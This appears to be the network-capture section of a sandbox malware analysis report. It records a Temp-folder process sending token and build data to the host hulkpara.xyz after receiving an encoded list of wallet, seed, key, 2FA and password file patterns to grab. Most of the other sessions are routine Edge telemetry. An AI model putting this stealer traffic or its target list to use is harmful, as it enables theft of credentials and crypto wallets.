                                                                                                                                                                                                                                                                                          2024-12-19 07:14:09 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                          Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          37192.168.2.74985494.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:11 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ZM7Q1DTJW4E37Q9ZCBA1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 453
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:11 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 4d 37 51 31 44 54 4a 57 34 45 33 37 51 39 5a 43 42 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 37 51 31 44 54 4a 57 34 45 33 37 51 39 5a 43 42 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 4d 37 51 31 44 54 4a 57 34 45 33 37 51 39 5a 43 42 41 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ZM7Q1DTJW4E37Q9ZCBA1Content-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------ZM7Q1DTJW4E37Q9ZCBA1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZM7Q1DTJW4E37Q9ZCBA1Cont
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:11 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:12 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          38192.168.2.74985552.168.117.1684431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:11 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597974994&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 11963
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:11 UTC11963OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 30 38 3a 34 36 3a 31 34 2e 39 39 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 63 37 34 34 62 30 36 2d 66 65 64 38 2d 34 33 66 35 2d 39 65 39 62 2d 65 64 30 39 63 34 34 35 39 39 33 36 22 2c 22 65 70 6f 63 68 22 3a 22 32 33 37 37 31 38 39 37 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-19T08:46:14.993Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"cc744b06-fed8-43f5-9e9b-ed09c4459936","epoch":"237718979"},"app":{"locale"
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:12 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=59114fc5417240e587156b557c02680f&HASH=5911&LV=202412&V=4&LU=1734592451673; Domain=.microsoft.com; Expires=Fri, 19 Dec 2025 07:14:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=a843b9aae7d2422282f82cf366ddb064; Domain=.microsoft.com; Expires=Thu, 19 Dec 2024 07:44:11 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: -5523321
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:11 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          39192.168.2.74985652.168.117.1684431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:11 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597975005&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 33333
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:11 UTC16384OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 30 38 3a 34 36 3a 31 35 2e 30 30 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 63 37 34 34 62 30 36 2d 66 65 64 38 2d 34 33 66 35 2d 39 65 39 62 2d 65 64 30 39 63 34 34 35 39 39 33 36 22 2c 22 65 70 6f 63 68 22 3a 22 32 33 37 37 31 38 39 37 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-19T08:46:15.003Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"cc744b06-fed8-43f5-9e9b-ed09c4459936","epoch":"237718979"},"app":{"locale"
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:11 UTC16384OUTData Raw: 74 61 74 69 63 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 6f 63 69 64 22 3a 22 6d 73 65 64 67 64 68 70 22 2c 22 70 72 6f 64 75 63 74 22 3a 22 61 6e 61 68 65 69 6d 22 2c 22 74 79 70 65 22 3a 22 64 68 70 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 2f 65 64 67 65 2f 6e 74 70 3f 6c 6f 63 61 6c 65 3d 65 6e 2d 47 42 26 74 69 74 6c 65 3d 4e 65 77 25 32 30 74 61 62 26 64 73 70 3d 31 26 73 70 3d 42 69 6e 67 26 69 73 46 52 45 4d 6f 64 61 6c 42 61 63 6b 67 72 6f 75 6e 64 3d 31 26 73 74 61 72 74 70 61 67 65 3d 31 26 50 43 3d 55 35 33 31 26 6f 63 69 64 3d 6d 73 65 64 67 64 68 70 22 2c 22 76 69 65 77 54 79 70 65 22 3a 22 73 69 7a 65 33 63 6f 6c 75 6d 6e 22 2c 22 74 68 65 6d 65 22 3a 22 6c 69 67
                                                                                                                                                                                                                                                                                          Data Ascii: tatic":false,"name":"default","ocid":"msedgdhp","product":"anaheim","type":"dhp","url":"https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531&ocid=msedgdhp","viewType":"size3column","theme":"lig
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:11 UTC565OUTData Raw: 31 2e 30 22 3a 7b 22 74 79 70 65 22 3a 22 6f 22 2c 22 73 70 61 6e 73 22 3a 7b 22 6e 65 74 77 6f 72 6b 22 3a 5b 31 36 33 36 39 2c 32 35 32 37 5d 7d 7d 2c 22 5b 63 64 6e 5d 2f 73 74 61 74 69 63 73 62 2f 73 74 61 74 69 63 73 2f 6c 61 74 65 73 74 2f 62 72 61 6e 64 2f 6e 65 77 2d 6d 73 6e 2d 6c 6f 67 6f 2d 63 6f 6c 6f 72 2d 62 6c 61 63 6b 2e 73 76 67 22 3a 7b 22 74 79 70 65 22 3a 22 6f 22 2c 22 73 70 61 6e 73 22 3a 7b 22 6e 65 74 77 6f 72 6b 22 3a 5b 31 39 33 37 31 2c 33 33 33 5d 7d 2c 22 64 75 72 61 74 69 6f 6e 73 22 3a 7b 22 63 6f 6e 6e 65 63 74 22 3a 39 2c 22 72 65 71 75 65 73 74 22 3a 33 32 34 2c 22 63 64 6e 54 43 50 22 3a 33 31 35 2c 22 63 64 6e 53 65 6c 66 22 3a 31 2c 22 63 64 6e 4f 72 69 67 69 6e 22 3a 30 7d 2c 22 73 63 61 6c 61 72 73 22 3a 7b 22 73 69
                                                                                                                                                                                                                                                                                          Data Ascii: 1.0":{"type":"o","spans":{"network":[16369,2527]}},"[cdn]/staticsb/statics/latest/brand/new-msn-logo-color-black.svg":{"type":"o","spans":{"network":[19371,333]},"durations":{"connect":9,"request":324,"cdnTCP":315,"cdnSelf":1,"cdnOrigin":0},"scalars":{"si
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:12 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=91c081d786564e3e800c6af1b87ad72f&HASH=91c0&LV=202412&V=4&LU=1734592452287; Domain=.microsoft.com; Expires=Fri, 19 Dec 2025 07:14:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=144a644c99c040f2a33d31b82a2787c0; Domain=.microsoft.com; Expires=Thu, 19 Dec 2024 07:44:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: -5522718
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:12 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          40192.168.2.74985952.168.117.1684431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:12 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597975825&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 5417
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:12 UTC5417OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 30 38 3a 34 36 3a 31 35 2e 38 32 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 63 37 34 34 62 30 36 2d 66 65 64 38 2d 34 33 66 35 2d 39 65 39 62 2d 65 64 30 39 63 34 34 35 39 39 33 36 22 2c 22 65 70 6f 63 68 22 3a 22 32 33 37 37 31 38 39 37 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-19T08:46:15.823Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"cc744b06-fed8-43f5-9e9b-ed09c4459936","epoch":"237718979"},"app":{"locale"
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:12 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=1aac42bfd96c4ff4b61c9655a5f0dc53&HASH=1aac&LV=202412&V=4&LU=1734592452548; Domain=.microsoft.com; Expires=Fri, 19 Dec 2025 07:14:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=392bbc3d3b444fb894be47bc7a72dd54; Domain=.microsoft.com; Expires=Thu, 19 Dec 2024 07:44:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: -5523277
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:12 GMT
                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          41192.168.2.74986052.168.117.1684431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:12 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734597976003&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 9827
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:12 UTC9827OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 30 38 3a 34 36 3a 31 36 2e 30 30 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 63 63 37 34 34 62 30 36 2d 66 65 64 38 2d 34 33 66 35 2d 39 65 39 62 2d 65 64 30 39 63 34 34 35 39 39 33 36 22 2c 22 65 70 6f 63 68 22 3a 22 32 33 37 37 31 38 39 37 39 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                                                                                                                                          Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-19T08:46:16.002Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"cc744b06-fed8-43f5-9e9b-ed09c4459936","epoch":"237718979"},"app":{"loca
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:13 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                          Set-Cookie: MC1=GUID=379a0263ac9a4ae0926f082c248cb6d5&HASH=379a&LV=202412&V=4&LU=1734592452672; Domain=.microsoft.com; Expires=Fri, 19 Dec 2025 07:14:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          Set-Cookie: MS0=fbe455c57fa040679a9db6f3e18673d6; Domain=.microsoft.com; Expires=Thu, 19 Dec 2024 07:44:12 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                          time-delta-millis: -5523331
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ntp.msn.com
